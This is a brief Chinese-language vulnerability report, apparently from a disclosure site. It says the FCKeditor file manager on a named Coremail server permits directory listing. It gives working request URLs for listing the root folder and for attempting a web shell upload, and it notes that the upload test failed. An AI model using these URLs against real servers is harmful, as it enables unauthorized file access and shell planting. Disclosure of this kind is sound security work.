发布者:pigdefeet
fckeditor的上传目录可以遍历,如http://www.coremail.cn/editor/editor/filemanager/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
通过http://www.coremail.cn/editor/editor/filemanager/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=/可上传shell文件,只做了简单的测试,没有成功。但不能保证可拦截所有形式的恶意文件上传。
0 条评论。